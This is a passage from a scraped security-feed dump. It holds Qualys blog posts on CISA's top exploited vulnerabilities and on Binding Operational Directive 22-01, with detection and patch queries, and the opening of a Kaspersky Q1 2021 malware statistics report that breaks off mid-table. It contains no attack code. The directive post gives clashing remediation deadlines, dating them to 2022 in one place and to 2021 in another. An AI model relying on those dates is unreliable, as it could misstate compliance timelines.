[ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-05-31T11:03:47", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | 